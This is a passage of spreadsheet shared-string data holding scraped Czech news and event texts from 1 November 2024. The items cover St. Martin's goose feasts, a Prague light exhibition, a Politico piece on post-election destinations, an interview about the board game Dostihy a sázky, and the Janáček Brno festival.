    <t>20241101_433_3241748079_d4e6899290afe5a7734d.html</t>
  </si>
  <si>
    <t>d4e6899290afe5a7734d</t>
  </si>
  <si>
    <t>Restaurace Hanačka v Troubelicích</t>
  </si>
  <si>
    <t>Restaurace Hanačka v Troubelicích Restaurace nabízí široký sortiment jídel za příznivou cenu, kvalitní kuchyň a příjemnou obsluhu. V restauraci jsou každoročně pořádány různé gastro akce, mezi které patří již tradiční Zvěřinové hody, Svatomartinská husa, pečená kolena a žebra, ... Restaurace nabízí dva salonky s kapacitou pro 50 a 120 hostů. Jsou využívány k rodinným oslavám, svatbám, promocím, školním setkáním, firemním večírkům. Počasí: dnes 9 °C Rychlost větru: 3 m/s Oblačnost: 85 % Tlak: 1032 hPa Vlhkost: 74 % Rychlost větru: 1 m/s Oblačnost: 34 % Tlak: 1030 hPa Vlhkost: 50 % Rychlost větru: 1 m/s Tlak: 1028 hPa Vlhkost: 47 % Rychlost větru: 1 m/s Tlak: 1028 hPa Vlhkost: 57 % Rychlost větru: 1 m/s Oblačnost: 82 % Tlak: 1029 hPa Vlhkost: 67 % Rychlost větru: 2 m/s Oblačnost: 2 % Tlak: 1029 hPa Vlhkost: 70 % Rychlost větru: 10 m/s Oblačnost: 100 % Tlak: 1013 hPa Vlhkost: 82 % Rychlost větru: 9 m/s Oblačnost: 99 % Tlak: 1014 hPa Vlhkost: 73 % &amp;lt; &amp;gt; Dozlatova upečená husička, zelí a knedlíky, k tomu sklenka místního piva nebo něčeho ostřejšího. Kolem svátku Martina nabídne svatomartinskou husu...</t>
  </si>
  <si>
    <t>20241101_434_3241745372_37aa22472a7ba8639ed9.html</t>
  </si>
  <si>
    <t>37aa22472a7ba8639ed9</t>
  </si>
  <si>
    <t>Denní výběr: Bez posezení u piva to nepůjde. Trnovany potřetí nabízejí vyhlášený motorest</t>
  </si>
  <si>
    <t>20241101_435_3241745371_26012318287cdb8f03e0.html</t>
  </si>
  <si>
    <t>26012318287cdb8f03e0</t>
  </si>
  <si>
    <t>20241101_436_3241757848_6dede8f25cf0545b54fe.html</t>
  </si>
  <si>
    <t>6dede8f25cf0545b54fe</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“ přináší do Žlutých lázní fascinující vesmírný zážitek Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezóně název „Zvonkova cesta vesmírem.“ Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstavu otevře areál od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. Spojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost Decoled . Odborná spolupráce „Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost Decoled . Výjimečné místo pro sváteční setkávání Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost Decoled . „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Eva Poláčková, majitelka společnosti Decoled . Zveme vás k jedinečnému zážitku Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Zveme všechny, aby si přišli užít spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnali si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí . Foto: titulní foto : Decoled Foto v článku : a Cysnews.cz Místo konání: Otevírací doba: Areál Žluté lázně Denně (po-ne) 16-21 hodin Podolské nábřeží 3/1184 140 00 Praha Více informací na: https://svetlavypraveji.cz/praha . Podrobnosti najdete také na www.zlutelazne.cz a instagramovém či facebookovém profilu areálu. Související Autor: Jana Bečková Autor person Jana Bečková Rubrika transition_slide Hlavní město Praha - Středočeský kraj</t>
  </si>
  <si>
    <t>20241101_437_3241745225_df86967015526561d40b.html</t>
  </si>
  <si>
    <t>df86967015526561d40b</t>
  </si>
  <si>
    <t>Dobré ráno: Plnoletost v děcáku? Igelitka, tři tisíce a sbohem. Děti jako Sam končí na ulici</t>
  </si>
  <si>
    <t>20241101_438_3241708940_3656c4bfe5a9b914f371.html</t>
  </si>
  <si>
    <t>3656c4bfe5a9b914f371</t>
  </si>
  <si>
    <t>Husí hody na hájence Na Volárně</t>
  </si>
  <si>
    <t>Husí hody na hájence Na Volárně Zveme vás na Husí hody do zrekonstruované hájenky v obci Roudno. Ochutnat budete moci husí paštiku, husí polévku, pečenou husu, husí játra a další husí pokrmy. Počasí: dnes 10 °C Rychlost větru: 2 m/s Oblačnost: 2 % Tlak: 1029 hPa Vlhkost: 56 % Rychlost větru: 3 m/s Oblačnost: 4 % Tlak: 1027 hPa Vlhkost: 50 % Rychlost větru: 4 m/s Tlak: 1028 hPa Vlhkost: 61 % Rychlost větru: 2 m/s Oblačnost: 100 % Tlak: 1027 hPa Vlhkost: 63 % Rychlost větru: 1 m/s Tlak: 1028 hPa Vlhkost: 65 % Rychlost větru: 3 m/s Oblačnost: 2 % Tlak: 1028 hPa Vlhkost: 66 % Rychlost větru: 6 m/s Oblačnost: 41 % Tlak: 1020 hPa Vlhkost: 76 % Rychlost větru: 4 m/s Oblačnost: 89 % Tlak: 1020 hPa Vlhkost: 88 % &amp;lt; &amp;gt; Dozlatova upečená husička, zelí a knedlíky, k tomu sklenka místního piva nebo něčeho ostřejšího. Kolem svátku Martina nabídne svatomartinskou husu...</t>
  </si>
  <si>
    <t>20241101_439_3241744716_d8748454571dd383aa54.html</t>
  </si>
  <si>
    <t>d8748454571dd383aa54</t>
  </si>
  <si>
    <t>Denní výběr: Kanadský obránce Will Reilly: Evropa? Připadám si, jako bych se vrátil v čase</t>
  </si>
  <si>
    <t>20241101_44_3264634675_13f9d00c6aeee4088cb7.html</t>
  </si>
  <si>
    <t>13f9d00c6aeee4088cb7</t>
  </si>
  <si>
    <t>Kam mohou Američané utéct po volbách? Pro Trumpovy příznivce je ideální Česko, píše Politico</t>
  </si>
  <si>
    <t>Kam mohou Američané utéct po volbách? Pro Trumpovy příznivce je ideální Česko, píše Politico Příznivci republikána Donalda Trumpa a ani demokratky Kamaly Harrisové nemusí zoufat, pokud jejich kandidát v úterních amerických prezidentských volbách neuspěje - Evropa poskytuje dostatek útočišť pro oba tábory. Portál Politico republikánům i demokratům nabízí hned několik států, kde se jim bude líbit. Republikánům doporučil Politico například Českou republiku , která má podle něj vlastní verzi Trumpa v podobě šéfa hnutí ANO Andreje Babiše. Sledovali jsme online Brusel 19:31 1. listopadu 2024 Příznivci Trumpa i Harrisové mohou po volbách utéct do Evropy | Foto: Marco Bello, Jeenah Moon | Zdroj: Reuters „Pokud jen přehlédnete několik menších odlišností - například oranžovou tvář - Česko nabízí svého vlastního obchodního magnáta, který se přeměnil v politického žháře: Andreje Babiše , který se brzy bude ucházet o návrat do vysokého úřadu,“ napsal Politico. V odkazu na Trumpovo volební heslo Make America Great Again (udělat Ameriku znovu skvělou) poznamenal, že Babiš chce zase skvělou učinit Českou republiku . „Před volbami v příštím roce mu preference rostou,“ uvedl. Babiše portál označil za velkého příznivce nápadů republikánského střihu, jako jsou radikální přistěhovalecká politika a sliby snížení daní. „Má dokonce červenou kšiltovku s nápisem silné Česko, která připomíná Trumpovy ikonické čepice Make America Great Again,“ vysvětlil server americkým čtenářům. „Stačí mu jen říkat Trump z Temu,“ dodal. Temu je čínský internetový prodejce, který je vyhlášený levnými alternativami dražších výrobků. Temu má ale problémy s kvalitou a bezpečnostní některých produktů. Text pod online reportáží. Krajně pravicové skupině Proud Boys („hrdí hoši“), která stojí za Trumpem, Politico vybral Durynsko na východě Německa . Zdůvodňuje to tím, že zde poprvé od prvního úspěchu ve 30. letech 20. století zvítězila nacistická strana, jak označil Alternativu pro Německo (AfD). „Zastánci nadřazenosti bílé rasy zde rovnou najdou spojence,“ dodal. Trumpově dělnické třídě by se podle Politika mohlo líbit v Maďarsku , které označil za nový průmyslový ráj s automobilkami a továrnami na baterie a s vyspělou čínskou technologií a kapitálem. „Bohužel nemůžete nosit zbraně tak svobodně jako v USA , ale není zde smrtonosnější zbraně než doma pálené pálinky (ovocná pálenka) - díky (Viktoru) Orbánovi osvobozená od daní,“ uvedl server. Prohra demokratů Demokraté, kteří neuznávají hranice států, mohou po případném Trumpově vítězství zamířit na Baleárské ostrovy ve Středomoří. Vláda španělského premiéra Pedra Sáncheze se totiž vzpírá trendu států Evropské unie zpřísnit přistěhovalectví. „Demokraté toužící po životě s vínem a revolucí a po tom, aby jejich daně přispěly ke štědřejšímu sociálnímu státu, by mohli skončit ve Francii ,“ nabízí Politico s tím, že luxus by zase mohli chtít hledat na jihu na Riviéře. V tomto případě ale portál varuje, že přímořská oblast je střediskem krajní pravice. Jasno má Politico také v tom, kam by se mohli uchýlit anarchističtí flamendři a zelení nadšenci. Pro ty první vidí jako ideál Amsterodam , pro ekology zase Brusel , kde šéfka Evropské komise Ursula von der Leyenová slibuje dekarbonizovat hospodářství. „Jen se musíte připravit každý rok na zhruba osm měsíců nepřetržitého deště,“ dodal o unijní metropoli server. Autor: Kateřina Vrbatová Autor Kateřina Vrbatová</t>
  </si>
  <si>
    <t>20241101_440_3241744824_ca8118b7d8cc91681e25.html</t>
  </si>
  <si>
    <t>ca8118b7d8cc91681e25</t>
  </si>
  <si>
    <t>20241101_441_3241744715_0fc60bcaecd56969c48b.html</t>
  </si>
  <si>
    <t>0fc60bcaecd56969c48b</t>
  </si>
  <si>
    <t>20241101_442_3241708101_7b964e72c495e88e32d0.html</t>
  </si>
  <si>
    <t>7b964e72c495e88e32d0</t>
  </si>
  <si>
    <t>Svatomartinská husa v restauraci Lázních Slatinice</t>
  </si>
  <si>
    <t>Svatomartinská husa v restauraci Lázních Slatinice V restauraci Lázně Slatinice můžete přijít ochutnat svatomartinské menu. Předkrm 70g Husí paštika s brusinkovým gelem, bageta 50g Husí játra v sádle, chléb Polévka 0,3l Svatomartinský husí vývar s játrovými knedlíčky, julienne zeleninou a nudlemi Hlavní pokrmy 1ks Pomalu pečené husí stehno s jablky, červené a bílé zelí, variace knedlíků 300g Lokše s trhanou husou a červeným vinným zelím Dezert 150g Jablkový závin s vlašskými ořechy, zmrzlinou a šlehačkou Počasí: dnes 7 °C Rychlost větru: 2 m/s Oblačnost: 74 % Tlak: 1033 hPa Vlhkost: 64 % Rychlost větru: 1 m/s Tlak: 1030 hPa Vlhkost: 50 % Rychlost větru: 1 m/s Oblačnost: 1 % Tlak: 1028 hPa Vlhkost: 56 % Rychlost větru: 3 m/s Tlak: 1028 hPa Vlhkost: 58 % Rychlost větru: 1 m/s Oblačnost: 100 % Tlak: 1029 hPa Vlhkost: 69 % Rychlost větru: 2 m/s Tlak: 1030 hPa Vlhkost: 69 % Rychlost větru: 2 m/s Oblačnost: 13 % Tlak: 1024 hPa Vlhkost: 73 % Rychlost větru: 2 m/s Oblačnost: 74 % Tlak: 1024 hPa Vlhkost: 72 % &amp;lt; &amp;gt; Kudy z nudy přináší aktuální tipy na víkendové zážitky (9.11. – 10.11.). Na jediném místě najdete tipy na akce ze všech krajů a regionů České... Přiveze letos svatý Martin do Česka sníh? I když to vypadá, že by to stihnout mohl, s jistotou to tvrdit nemůžeme. Ale už teď je jisté, že společně s... Dozlatova upečená husička, zelí a knedlíky, k tomu sklenka místního piva nebo něčeho ostřejšího. Kolem svátku Martina nabídne svatomartinskou husu...</t>
  </si>
  <si>
    <t>20241101_443_3241691099_9a3d089463f0aec9ceeb.html</t>
  </si>
  <si>
    <t>9a3d089463f0aec9ceeb</t>
  </si>
  <si>
    <t>Restaurace Lázní Slatinice – Morava a Balnea</t>
  </si>
  <si>
    <t>Restaurace Lázní Slatinice – Morava a Balnea slouží nejen ke splnění labužnických přání všem návštěvníkům lázní v průběhu celého roku. S příchodem teplých jarních dnů je k dispozici příjemné posezení na venkovních zahrádkách s obsluhou. V restauracích můžete ochutnat: výbornou tradiční i moderní kuchyni široký výběr dezertů vlastní výroby nabídku kvalitních vín Lázeňský likér specialitu „Kávu z vody z lázeňského pramene" – Slatinku Počasí: dnes 3 °C Rychlost větru: 2 m/s Oblačnost: 92 % Tlak: 1033 hPa Vlhkost: 71 % Rychlost větru: 1 m/s Oblačnost: 40 % Tlak: 1029 hPa Vlhkost: 45 % Rychlost větru: 1 m/s Tlak: 1028 hPa Vlhkost: 44 % Rychlost větru: 2 m/s Tlak: 1029 hPa Vlhkost: 60 % Rychlost větru: 1 m/s Oblačnost: 84 % Tlak: 1029 hPa Vlhkost: 64 % Rychlost větru: 1 m/s Tlak: 1029 hPa Vlhkost: 66 % Rychlost větru: 8 m/s Oblačnost: 100 % Tlak: 1013 hPa Vlhkost: 84 % Rychlost větru: 8 m/s Oblačnost: 94 % Tlak: 1015 hPa Vlhkost: 72 % &amp;lt; &amp;gt; Dozlatova upečená husička, zelí a knedlíky, k tomu sklenka místního piva nebo něčeho ostřejšího. Kolem svátku Martina nabídne svatomartinskou husu...</t>
  </si>
  <si>
    <t>20241101_444_3241686848_a11d732c12e2b25565f2.html</t>
  </si>
  <si>
    <t>a11d732c12e2b25565f2</t>
  </si>
  <si>
    <t>Hráli jsme Dostihy s vnučkou jejich autora. Pořád byla v distancu, v reálu jich prodá 25 tisíc ročně</t>
  </si>
  <si>
    <t>Hráli jsme Dostihy s vnučkou jejich autora. Pořád byla v distancu, v reálu jich prodá 25 tisíc ročně Její dědeček Dostihy a sázky vymyslel – a Kristýna Miškovská po něm převzala firmu Dino Toys , která je ve velkém stále vyrábí. Sdílet Zdroj zábavy, zabiják nudy, vyvolávač svárů a tak trochu i kulturní dědictví celé země. Tím vším jsou legendární Dostihy a sázky, desková hra, která přesně před 40 lety přinesla trochu svěžího kapitalismu do stojatých socialistických vod. Taky se tehdy soudruhům vůbec nelíbila. Lidé ji však milovali a milují dodnes, jak potvrzuje Kristýna Miškovská a její manžel Václav, kteří jsou třetí generací přebírající vydavatelství Dino Toys, jež Dostihy a sázky vlastní. Nedalo nám to a vyzvali jsme je ke hře, při které jsme se dozvěděli, zda se dědeček Miškovské inspiroval hrou Monopoly a co všechno má mladá krev s Dinem v plánu. Venku je okolo deseti stupňů a mrholí, tedy ideální podmínky zavřít se v teple kavárny a vybalit nejznámější českou deskovku Dostihy a sázky. Dnes to nebude jednoduché, soupeři nám jsou odborníci na slovo vzatí. V žilách Kristýny Miškovské koluje krev Ladislava Mareše, který hru vymyslel. Její manžel Václav je zase herní nadšenec do morku kostí a dá se s ním o nich hovořit dlouhé hodiny. Jak navíc sami přiznávají, Dostihy a sázky hrají na chalupě se sklenkou vína poměrně často. Právě Miškovští jsou novou generací, která přebírá kormidlo rodinné firmy Dino Toys . Tu děda Mareš založil po revoluci a její portfolio se za oněch třicet let rozrostlo na 600 produktů, mezi kterými nechybí další deskovky, puzzle, kostky, ale i legendární plastová Tatra . Nezdržujme však hru, rozeberme si figurky a pojďme na to. „Kristýna chce fialovou, “ oznamuje Václav s potutelným úsměvem. „Tu rozhodně nechci, nemám ji ráda,“ oponuje jeho žena, která na sebe vzala roli bankéře, a tak háže kostkou jako první. Jak prozrazuje, hry, ve kterých je právě kostka, nejsou její silná parketa, což se také velmi brzy potvrdí. +4 Když její děda v roce 1984 hru Dostihy a sázky vymýšlel, o přítomnosti kostky měl stejně jasno jako o zasazení celé hry do prostředí koňských dostihů. „Dodnes nechápu proč, ale za socialismu bylo sázení na koně povolené. Dědu fascinoval ten adrenalin a kompetitivnost celého prostředí, ale žádný koňák tehdy rozhodně nebyl,“ vysvětluje Miškovská a vytahuje ofocený novinový článek z Rudého práva. Přestože sázení na koníky soudruhy bavilo, hra na toto téma nikoliv, a proto vyšla velmi ostrá kritika. „Ten článek končí větou: ‚Řekni mi, s čím si hraješ, a já ti povím, jaký člověk jsi‘,“ ukazuje s úsměvem Miškovská. „Zapůsobil samozřejmě perfektně. Na hru se stály fronty, a přestože tehdy v tiskárně v Jablonci , kde děda pracoval, tiskli 700 kusů denně, nestačili odbavovat poptávku,“ dodává vnučka člověka, kterého sama označuje za vizionáře, a Miškovský dokonce za ranaře s tahem na branku, který si byl schopen udržet autorská práva na hru. Jedna z prvních vět, co před hrou slyšíme, je přísné ponaučení: „Kdo někomu napoví, že mu soupeř stoupnul na koně, dostane podle pravidel pokutu!“ Tady se hraje zostra. A brzy vám dojde, jak tuhle hru, kterou „přece zná každý“, vlastně neznáte. „Lidé často opomíjejí mechanismus dostihů. Když jsou koně nasazení do hlavního dostihu sezony a začnete na ně sázet, můžete tím druhého hráče totálně zlikvidovat, protože vám musí vyplatit desetinásobek,“ upozorňuje Václav. „Nezdržuj a házej,“ pobízí ho manželka – závod začíná. A hned v prvním kole si kolegiálně připomeneme, kdo kam stoupnul. V tu ránu s nejšibalštějším úsměvem z Václavových rtů přichází: „Upozornění, pokuta!“ Zaplatíme ji samozřejmě ještě několikrát. Jediné štěstí stáje CzechCrunch je to, že existuje políčko Distanc… Velký zájem o ni je i dnes. A to takový, že Dino prodává každý rok stabilních 25 tisíc kusů. „Jsme silní v retailu, a když lidé při běžném nákupu hru vidí, je to pro ně skvělý způsob, jak se otisknout do svých potomků a předat jim něco ze svého mládí,“ říká Miškovský, zatímco jeho žena kupuje prvního koně – krásného hřebce Korana za 2 400 herních korun, byť by možná raději stoupla na trenéra, který je prý její nejoblíbenější zdroj peněz ve hře. To Miškovský vyjmenovává své oblíbence z první a nejlevnější červené stáje a šampiony z nejprestižnější tmavě modré stáje. Stejně jako Koran v roce 1963 i všichni ostatní herní koníci nesou jména skutečných dostihových koní – v řadě případů účastníků, či dokonce vítězů Velké pardubické. „Cena tomu ale rozhodně neodpovídá,“ říká s úsměvem Miškovská, původně vystudovaná filmová produkční. Ani děda netrvá na tom, že Dino musí přežít Přestože Kristýna jezdila s firemním paleťákem už jako malá holka a dnes zná jména dětí zaměstnanců i to, zda měli neštovice, nikdy nebylo dáno, že jednou rodinný podnik převezme. „U nás doma na to nebyl tlak. I když se bavím s dědou, tak necítím, že by nějak trval na tom, že Dino zůstane zachováno. Nemusí,“ vysvětluje Miškovská s tím, že ona i manžel měli své vlastní projekty, které je bavily a dobře živily. Jak už to ovšem u rodinných firem bývá, změna v rodině často dopadne také na podnik. Když z pozice jednatele Dino Toys odstoupil kvůli rozvodu rodičů její otec a maminka se musela vrátit do vedoucí pozice, které se předtím s radostí vzdala, museli se manželé Miškovští rozhodnout. Buď se dál věnovat filmové produkci a podnikání v marketingu, nebo se stát třetí generací ve vedení Dina. Zvolili rodinný odkaz. Miškovská se pustila do strategického řízení, zatímco Miškovský funguje v denní operativě a pouští se do prosazování nových vizí. „Hvězdy jsou v příznivé konstelaci. Teď je správný čas na novou transformaci Dina, jsme tu my, kdo ji chce vést, máme nové lidi ve vrcholovém managementu a všichni z toho mají radost,“ vysvětluje Miškovský. V covidovém období by přitom málokdo řekl, že Dino potřebuje transformaci. Vedlo si extrémně dobře. O hry byl velký zájem, protože lidé trávili veškerý čas doma, a obrat se vyšplhal na téměř čtvrt miliardy korun. „Trh se ale zásadně proměnil. Přišla řada nových, menších vydavatelů třeba jen s jednou hrou. A na druhé straně začaly vznikat výrobní problémy spojené s výpadky v logistice a zvyšováním cen. Po covidu přišla krize. Zájem o hry opadl a vznikl obrovský tlak na vydavatele i průnik do digitalizace a e-commerce,“ vysvětluje Miškovský. „Václave, jak je možné, že už máš tři koně a já jsem pořád v distancu?“ Tahle začarovaná smůla Kristýny ale netrvá věčně. I když, jak se to vezme: „Konečně hraju! Jdu na políčko Finance… a mám zaplatit dluh tři tisíce?! Sakra.“ Chce se něco říct o kovářově kobyle… Jenže to by tu nesměl být Václav, jehož spanilá jízda závodištěm mu s každým dalším kolem přihrává nevyhnutelné vítězství o mnoho koňských délek. „Nemám moc peněz, ale mám to všechno v kobylách,“ říká. „Jsou to sice ti nejhorší koně, ale je to jedna plná stáj vedle druhé. Prostě korunka ke korunce. Asi si koupím nějakou srandičku, třeba další dostih,“ přidává s neustále se rozšiřujícím úsměvem. A jak se rozšiřuje jeho úsměv, tak se ztenčují naše naděje. Přestože Dino rychle zareagovalo a přišlo s deskovkami pro jednoho či dva hráče a s mechanismy, díky kterým se hraní her částečně přesunulo i do digitálního světa, ani jemu se nevyhnuly problémy. „Po 30 letech tak nastal ideální čas udělat revizi, které z oněch více než 600 produktů skutečně vydělávají,“ dodává Miškovská, která už třetí tah stojí na distancu a zaboha nemůže hodit šestku, která by ji z něj vysvobodila. Při své marné snaze připomíná, že na druhou stranu sílí u zákazníků Dina únava z technologií, a proto naopak druhou výraznou část zákazníků tvoří hráči, kteří se snaží s pomocí klasických deskových her digitálnímu světu uniknout. „Český zákazník umí být velmi konzervativní. Musíme proto šikovně kombinovat úplné novinky s tím, co zákazník zná a co posledních 40 let pravidelně hraje na chalupě,“ dodává Miškovská. Krteček baví, Láďa Hruška ne Takových perel má Dino ve svém rejstříku několik. Do takzvaného zlatého fondu her, jak jej Miškovská s úsměvem nazývá, patří mimo Dostihů i Člověče, nezlob se, Moje první hra či Pojď si hrát s motivy Krtečka. Na ty má dodnes Dino díky přátelství Ladislava Mareše s výtvarníkem Zdeňkem Milerem výhradní licenci pro použití na deskovkách. Kromě Milera měl Mareš kontakty také na přátele v Nizozemsku , díky kterým získal legendární Monopoly, které bylo do určité míry inspirací při vymýšlení Dostihů. „Když jsem se ho na to ptala, tak mi říkal, že Monopoly hrál rád, ale vždy mu vadil zdlouhavý konec hry. Chtěl něco, kde bude větší adrenalin a moment zvratu, a proto tam dal sázky. Nějaká inspirace tam tedy byla, ale je to klasický model a ty mechanismy se prolínají napříč celým herním světem,“ dodává Miškovská. +2 Spolu s Krtkem nabízí Dino produkty s řadou dalších licencí od Disney až po Prasátko Peppu. Dobře funguje i spolupráce s Českou televizí či Primou, v rámci kterých nabízí hry na motivy pořadů jako AZ-kvíz, Zázraky přírody či Máme rádi Česko . Ne vždy se však podaří trefit do vkusu zákazníka, a zatímco třeba znovuzrozená Tatra byl tah, který se Dinu i přes velké počáteční investice vyplatil, deskovku na motivy pořadu s Láďou Hruškou označují Miškovští za propadák. Ve svém portfoliu mají i několik produktů s licencemi Harryho Pottera či Pána prstenů, které oslovují zase jinou skupinu zákazníků. Právě na tu se chce Dino do budoucna ještě více zaměřit, a proto začíná více pracovat například s anime motivy. A pak jsou tu senioři, u kterých cítí Miškovský také velký potenciál a i jim chce začít nabízet produkty na míru. „Kdy jste se naposledi pohádali u hry,“ snažíme se otázkou zamést pod stůl naši potupnou porážku. „No, když jsme dostihy hráli naposled. A taky nedávno u vrhcábů,“ odpovídá Kristýna. „Týna se pořád uráží,“ říká manžel. „Já nemůžu za to, že neznáš pravidla.“ „A já nemůžu za to, že neházíš šestky.“ Lehoulince pichlavý, ale srdečně úsměvný dialog, který v obdobné podobě zná každý, kdo někdy nějakou deskovku s blízkými hrál. „Ale když se hádáme, tak jenom hezky,“ říkají svorně Miškovští. „Už připravujeme verze her, které budou mít například větší písmo,“ vysvětluje s tím, že zájmem společnosti je také více expandovat do zahraničí. „Měli jsme poměrně silný export. Jistou dobu tvořil třetinu našeho obratu. Ale pak šel dolů s krizí. Takže prostor pro zlepšení je velký. Máme velmi dobré obchodní vztahy v Izraeli , ale zájem je třeba i ze Spojených států nebo Japonska ,“ dodává Miškovská. Kromě nových produktů chce Dino věnovat více pozornosti i klasikám a jejich reedicím. Například Dostihy a sázky se dočkaly ke 40. narozeninám unikátní retroedice, která kopíruje první vydání. „Záměrně jsme tam nechali tiskové chyby a další nepřesnosti, pracujeme s původními obrázky, používáme papír, aby byly peníze stejné na omak, a tak podobně,“ popisuje Miškovský. Nadšený je z ní rozhodně i dvaaosmdesátiletý Ladislav Mareš, který si užívá důchodu v Českém ráji. Díky Dostihům si nakonec ke koním vytvořil takovou lásku, že zde postavil stáj a chová tu několik koní. Jezdit na nich navíc naučil i svou vnučku. Kristýna Miškovská tak strávila dětství právě na koňském hřbetu. A teď z vedoucí pozice v Dino Toys dohlíží na nestárnoucí úspěch Dostihů a sázek. Vybrali jsme pro vás: Týden Měsíc 1 Z Kingdom Come bude seriál. Jiný, než v jaký doufáte, ale vyjde už za pár dní a má herce ze hry 2 Autor: Michal Mančař Autor person Michal Mančař</t>
  </si>
  <si>
    <t>56600</t>
  </si>
  <si>
    <t>35040</t>
  </si>
  <si>
    <t>20241101_445_3241651649_bd8a830b8551aec675bc.html</t>
  </si>
  <si>
    <t>bd8a830b8551aec675bc</t>
  </si>
  <si>
    <t>Nadupaný Janáček jede bez hranic, představí i „nejšílenější operu“</t>
  </si>
  <si>
    <t>Nadupaný Janáček jede bez hranic, představí i „nejšílenější operu“ 1. listopadu 2024 6:22 Jen tři festivaly v České republice stojí ministerstvu kultury za speciální podporu. Ten filmový v Karlových Varech , stálice Pražské jaro a nově také festival Janáček Brno. Ten se v letošním Roku české hudby a při četných janáčkovských výročích, včetně 170 let od narození věhlasného skladatele, koná od tohoto pátku do 24. listopadu na mnoha místech Brna se skutečně bohatým programem. Daniel Matoušek jako Blankytný a Nicky Spence jako Matěj Brouček v inscenaci Výlety páně Broučkovy na pódiu Národního divadla Brno . (2024) | foto: Marek Olbrzymek 20 fotografií Prestižní operní festival Janáček Brno láká do jihomoravské metropole na třítýdenní multižánrovou nabídku. „Tento operní festival se za dobu své existence vyprofiloval v jedinečnou akci s velkým mezinárodním ohlasem. Právě díky téhle reputaci navázal umělecké spolupráce, které v podmínkách České republiky nemají obdoby,“ zdůvodnil téměř přesně před rokem přímo v Brně příspěvek patnáct milionů korun ministr kultury Martin Baxa ( ODS ). Výběr z programu Leoš Janáček – Výlety páně Broučkovy: slavnostní zahájení festivalu 1. 11., Janáčkovo divadlo Pavel Haas – Šarlatán: 8. 11., Mahenovo divadlo Leoš Janáček – Příhody lišky Bystroušky: 10. 11., Mahenovo divadlo Leoš Janáček – Věc Makropulos: 16. 11., Janáčkovo divadlo Antonín Dvořák – Rusalka: 23. 11., Janáčkovo divadlo Leoš Janáček – Příhody lišky Bystroušky: slavnostní zakončení festivalu 24. 11., Janáčkovo divadlo „Festivalový program se v ročníku 2024 dotkne hvězdných výšin. Pomyslnou laťku kvality se během krátké doby podařilo zvednout na úroveň, která splňuje parametry prvořadé evropské kulturní události,“ dodává k tomu za pořádající Národní divadlo Brno (NdB) jeho ředitel Martin Glaser. A široká nabídka pod heslem Bez hranic! skutečně dokazuje, že přímou dotaci od státu se podařilo zhodnotit. „Jako lidé si hranic stavíme nespočetně, ale cesta do říše fantazie je otevřena všem a hudba, ta žádné hranice nezná,“ zdůvodňuje motto letošního ročníku dramaturgyně Janáčkovy opery Patricie Částková. Umělecký šéf Jiří Heřman přidává, že už když člověk prvně vstoupil na Měsíc, hrála k tomu Novosvětská českého hudebního skladatele Antonína Dvořáka . „S radostí nyní otevíráme interpretační hranice a těšíme se na zážitky z různorodých pohledů na díla našich skladatelů,“ zve Heřman na program letošního ročníku. Speciálně na to, co s operou Leoše Janáčka Výlety páně Broučkovy provedl kanadský režisér Robert Carsen a skotský tenorista Nicky Spence v titulní roli. Nejúžasnější a nejšílenější opera 